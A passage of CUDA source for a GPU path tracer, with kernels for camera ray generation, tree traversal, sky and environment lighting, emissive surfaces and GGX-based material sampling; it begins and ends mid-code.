surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - O[0]; \ c[1] = vertex[1] - O[1]; \ c[2] = vertex[2] - O[2]; \ r[0] = (D[1] * c[2]) - (D[2] * c[1]); \ r[1] = (D[2] * c[0]) - (D[0] * c[2]); \ r[2] = (D[0] * c[1]) - (D[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-D, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ node_offset = TREE_TRAIL_END; \ break; \ } \ } \ } \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ } /// __global__ void Primary(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, Camera camera, uint4 b_seeds, int32_t width, int32_t height, int32_t invert_y, int32_t sample) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float o[3], d[3]; float pixel_sample[2]; PRNG(global_id, b_seeds.x, pixel_sample[0]); PRNG(global_id, b_seeds.y, pixel_sample[1]); int32_t x_pixel = global_id % width; int32_t y_pixel = global_id / width; if (invert_y) { y_pixel = (height - 1) - y_pixel; } float p[3] = { camera.root_pixel[0] + ((x_pixel + pixel_sample[0]) * camera.pixel_offset[0]), camera.root_pixel[1] + ((y_pixel + pixel_sample[1]) * camera.pixel_offset[1]), 1.0f }; p[0] *= camera.focal_depth; p[1] *= camera.focal_depth; p[2] *= camera.focal_depth; float pt[3]; TRANSFORM_X(p, camera.transform, pt); TRANSFORM_Y(p, camera.transform, pt); TRANSFORM_Z(p, camera.transform, pt); float aperture_sample[4]; PRNG(global_id, b_seeds.z, aperture_sample[0]); PRNG(global_id, b_seeds.w, aperture_sample[1]); float aperture_o[3]; CONCENTRIC_HEMI(aperture_sample[0], aperture_sample[1], aperture_o); aperture_o[0] *= camera.aperture_size; aperture_o[1] *= camera.aperture_size; aperture_o[2] = 0.0f; TRANSFORM_X(aperture_o, camera.transform, o); TRANSFORM_Y(aperture_o, camera.transform, o); TRANSFORM_Z(aperture_o, camera.transform, o); d[0] = pt[0] - o[0]; d[1] = pt[1] - o[1]; d[2] = pt[2] - o[2]; NORMALIZE(d); ray_state[RS_THROUGHPUT_R] = 1.0f; ray_state[RS_THROUGHPUT_G] = 1.0f; ray_state[RS_THROUGHPUT_B] = 1.0f; if (sample == 0) { ray_state[RS_COLOR_R] = 0.0f; ray_state[RS_COLOR_G] = 0.0f; ray_state[RS_COLOR_B] = 0.0f; } TRACE(use_nodes_image, use_triangles_image, true); ray_state[RS_LAST_BRDF_PDF] = DIRAC_PDF; return; } /// __global__ void Secondary(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state != STATE_SECONDARY) { return; } float o[3], d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; o[0] = ray_state[RS_ORIGIN_X] + (d[0] * EPSILON); o[1] = ray_state[RS_ORIGIN_Y] + (d[1] * EPSILON); o[2] = ray_state[RS_ORIGIN_Z] + (d[2] * EPSILON); TRACE(use_triangles_image, use_nodes_image, false); } /// __global__ void EnvSky(float* ray_state, cudaTextureObject_t sun_table, Sun sun, int32_t width, int32_t height, int32_t bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; float s = -6360.5f * d_i[1]; float mu = -s * 0.00015722034f; float nu = d_i[0] * sun.direction[0] + d_i[1] * sun.direction[1] + d_i[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / (raymie.x) * (beta_r.x / beta_r) * \ (1.0f + (d_i[1] * 3.0f)); float4 result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; float sun_delta = sun.direction[0] * d_i[0] + sun.direction[1] * d_i[1] + sun.direction[2] * d_i[2]; float color[3] = { result.x, result.y, result.z }; float mis = 1.0f; if ((brdf_pdf != -1.0f) && (sun_delta >= SUN_COS_THETA)) { float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { if (sun.sun_intensity > 0.0f) { mis = MIS(brdf_pdf, sun_pdf); } else { sun.sun_intensity *= 0.05f; } } else { if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } sun.sun_intensity *= 0.05f; } } else { sun.sun_intensity *= 0.05f; } float horizon_falloff = fabs(d_i[1] - 0.075f) - (d_i[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); color[0] *= multiplier; color[1] *= multiplier; color[2] *= multiplier; } else if (bounce > 0) { float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(color[0], fmax(color[1], color[2])); color[0] = lerp(color[0], max_component * 1.0f, horizon_bias); color[1] = lerp(color[1], max_component * 0.98f, horizon_bias); color[2] = lerp(color[2], max_component * 0.73f, horizon_bias); color[0] *= sun.color[0]; color[1] *= sun.color[1]; color[2] *= sun.color[2]; } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void EnvMap(float* ray_state, cudaTextureObject_t environment_map, EnvironmentProperties environment_properties, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; NORMALIZE(d_i); float2 uv = make_float2(1.0f + atan2(d_i[0], -d_i[2]), acos(-d_i[1]) * INV_PI); uv.x *= INV_TAU; uv.x += environment_properties.rotation; float4 color = tex2D<float4>(environment_map, uv.x, uv.y); color.x *= environment_properties.intensity; color.y *= environment_properties.intensity; color.z *= environment_properties.intensity; ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color.x; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color.y; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color.z; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void Emission(float* ray_state, Material* materials, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t emission_atlas, int32_t emitter_count, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_EMISSIVE) { return; } float d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; int tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; float vn[3]; if (use_triangles_image) { vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } NORMALIZE(vn); float dot_ni = DOT(-d, vn); if (dot_ni <= 0.0f) { ray_state[RS_STATE] = STATE_END; return; } else { uint mat_id; float uv[2]; float inverse_area; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); } else { mat_id = triangles[tri_index].material_id; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; inverse_area = triangles[tri_index].inverse_area; } float t = ray_state[RS_HIT_DISTANCE]; float t_2 = t * t; float emitter_color[3]; float intensity = materials[mat_id].emission * 25.0f; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; emission_uv.x = uv[0]; emission_uv.y = uv[1]; emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; if (brdf_pdf == -1.0f) { ray_state[RS_STATE] = STATE_END; return; } float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(dot_ni)) * emitter_prob; float mis = 1.0f; if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { mis = MIS(brdf_pdf, emitter_pdf); } else if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * emitter_color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * emitter_color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * emitter_color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } } /// __global__ void Sample(float* ray_state, Material* materials, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t normal_atlas, cudaTextureObject_t metallic_atlas, cudaTextureObject_t emission_atlas, cudaTextureObject_t sun_table, Sun sun, cudaTextureObject_t environment_map, EnvironmentProperties environment_properties, EmitterIndex* emitters, int32_t emitter_count, PortalIndex* portals, int32_t portal_count, uint4 b_seeds_0, uint4 b_seeds_1, uint4 b_seeds_2, uint4 b_seeds_3, int32_t width, int32_t height, int32_t sample_sun) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float last_brdf_pdf; float new_brdf_pdf; float sn[3]; float vn[3]; float n[3]; float n_tangent[3]; float n_binormal[3]; float ld_i[3]; float old_throughput[3]; float albedo[3]; float metallic; float smoothness; bool glass_material; { float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; uint32_t tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; uint32_t mat_id; float uv[2]; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); sn[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); sn[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); sn[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[tri_index].material_id; sn[0] = triangles[tri_index].surface_normal[0]; sn[1] = triangles[tri_index].surface_normal[1]; sn[2] = triangles[tri_index].surface_normal[2]; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } glass_material = (materials[mat_id].glass > 0.0f); float d_i[3]; d_i[0] = -ray_state[RS_DIR_X]; d_i[1] = -ray_state[RS_DIR_Y]; d_i[2] = -ray_state[RS_DIR_Z]; albedo[0] = materials[mat_id].albedo[0]; albedo[1] = materials[mat_id].albedo[1]; albedo[2] = materials[mat_id].albedo[2]; if (materials[mat_id].map_flags & MAP_FLAG_ALBEDO) { float2 albedo_uv; albedo_uv.x = uv[0]; albedo_uv.y = uv[1]; albedo_uv.x = lerp(materials[mat_id].albedo_bounds[0] + 0.5f, materials[mat_id].albedo_bounds[1] - 0.5f, albedo_uv.x); albedo_uv.y = lerp(materials[mat_id].albedo_bounds[2] + 0.5f, materials[mat_id].albedo_bounds[3] - 0.5f, albedo_uv.y); float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, albedo_uv.y); albedo[0] *= albedo_map.y; albedo[1] *= albedo_map.z; albedo[2] *= albedo_map.w; } if (materials[mat_id].map_flags & MAP_FLAG_NORMAL) { float2 normal_uv; normal_uv.x = uv[0]; normal_uv.y = uv[1]; normal_uv.x = lerp(materials[mat_id].normal_bounds[0] + 0.5f, materials[mat_id].normal_bounds[1] - 0.5f, normal_uv.x); normal_uv.y = lerp(materials[mat_id].normal_bounds[2] + 0.5f, materials[mat_id].normal_bounds[3] - 0.5f, normal_uv.y); float4 normal_map = tex2D<float4>(normal_atlas, normal_uv.x, normal_uv.y); float vn_tangent[3], vn_binormal[3]; GET_VT_BASIS(vn, vn_tangent, vn_binormal); float ln[3]; ln[0] = normal_map.x * 2.0f - 1.0f; ln[1] = normal_map.z * 2.0f - 1.0f; ln[2] = sqrt(1.0f - saturate(ln[0] * ln[0] + ln[1] * ln[1])); ROTATE_TO_BASIS(ln, vn, vn_tangent, vn_binormal, n); } else { n[0] = vn[0]; n[1] = vn[1]; n[2] = vn[2]; } NORMALIZE(n); if (!glass_material && (DOT(d_i, sn) < 0.0f)) { n[0] = -n[0]; n[1] = -n[1]; n[2] = -n[2]; } metallic = materials[mat_id].metallic; smoothness = materials[mat_id].smoothness; if (materials[mat_id].map_flags & MAP_FLAG_METALLIC) { float2 metallic_uv; metallic_uv.x = uv[0]; metallic_uv.y = uv[1]; metallic_uv.x = lerp(materials[mat_id].metallic_bounds[0] + 0.5f, materials[mat_id].metallic_bounds[1] - 0.5f, metallic_uv.x); metallic_uv.y = lerp(materials[mat_id].metallic_bounds[2] + 0.5f, materials[mat_id].metallic_bounds[3] - 0.5f, metallic_uv.y); float4 metallic_map = tex2D<float4>(metallic_atlas, metallic_uv.x, metallic_uv.y); metallic *= metallic_map.y; smoothness *= metallic_map.x; } float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; GET_BASIS(n, n_tangent, n_binormal); RELATIVE_TO_BASIS(d_i, n, n_tangent, n_binormal, ld_i); float ggx_pdf; float ln_facet[3]; if (smoothness == 1.0f) { ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; ggx_pdf = DIRAC_PDF; } else { float ggx_samples[2]; PRNG(global_id, b_seeds_0.x, ggx_samples[0]); PRNG(global_id, b_seeds_0.y, ggx_samples[1]); GGX_SAMPLE(ld_i, roughness, ggx_samples[0], ggx_samples[1], ln_facet); float g1, eval; SMITH_G1(ld_i, ln_facet, roughness, g1); GGX_EVAL(ln_facet, roughness, eval); ggx_pdf = g1 * fabs(DOT(ld_i, ln_facet)) * eval / fabs(ld_i[2]); } if (ld_i[2] == 0.0f) { ggx_pdf = 0.0f; } last_brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float brdf_color[3]; float ld_o[3]; float sample_dice; PRNG(global_id, b_seeds_0.z, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface float fresnel, cos_theta_t; DIELECTRIC_FRESNEL(ld_i[2], 1.5f, cos_theta_t, fresnel); float reflect_sample; PRNG(global_id, b_seeds_0.w, reflect_sample); if (reflect_sample <= (fresnel * coating_dropoff)) { // Reflect float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = 1.0f; brdf_color[1] = 1.0f; brdf_color[2] = 1.0f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf; new_brdf_pdf *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Transmit if (glass_material) { // Refract float ior = (cos_theta_t < 0.0f) ? (1.0f / 1.5f) : 1.5f; float ior_2 = ior * ior; float dot_ni = DOT(ln_facet, ld_i); float c = dot_ni * ior + cos_theta_t; ld_o[0] = ln_facet[0] * c - ld_i[0] * ior; ld_o[1] = ln_facet[1] * c - ld_i[1] * ior; ld_o[2] = ln_facet[2] * c - ld_i[2] * ior; copysign(ld_o[2], -ld_o[1]); NORMALIZE(ld_o); if ((cos_theta_t == 0.0f) || (ld_i[2] * ld_o[2] >= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = albedo[0] * ior_2; brdf_color[1] = albedo[1] * ior_2; brdf_color[2] = albedo[2] * ior_2; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { float dot_no = DOT(ln_facet, ld_o); new_brdf_pdf = ggx_pdf; float sqrt_denom = dot_ni + ior * dot_no; float dwh_dwo = (ior_2 * dot_no) / (sqrt_denom * sqrt_denom); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Diffuse ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; float ln_tangent[3]; float ln_binormal[3]; GET_BASIS(ln_facet, ln_tangent, ln_binormal); float hemi_sample[2]; PRNG(global_id, b_seeds_1.x, hemi_sample[0]); PRNG(global_id, b_seeds_1.y, hemi_sample[1]); float hemi_d[3]; CONCENTRIC_HEMI(hemi_sample[0], hemi_sample[1], hemi_d); ROTATE_TO_BASIS(hemi_d, ln_facet, ln_tangent, ln_binormal, ld_o); ld_o[2] = fabs(ld_o[2]); brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; new_brdf_pdf = INV_PI * ld_o[2]; } } } else { // Conductor float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { float f; CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); brdf_color[0] = albedo[0] * f; brdf_color[1] = albedo[1] * f; brdf_color[2] = albedo[2] * f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf / (4.0f * DOT(ld_o, ln_facet)); } } } } float d_o[3]; ROTATE_TO_BASIS(ld_o, n, n_tangent, n_binormal, d_o); 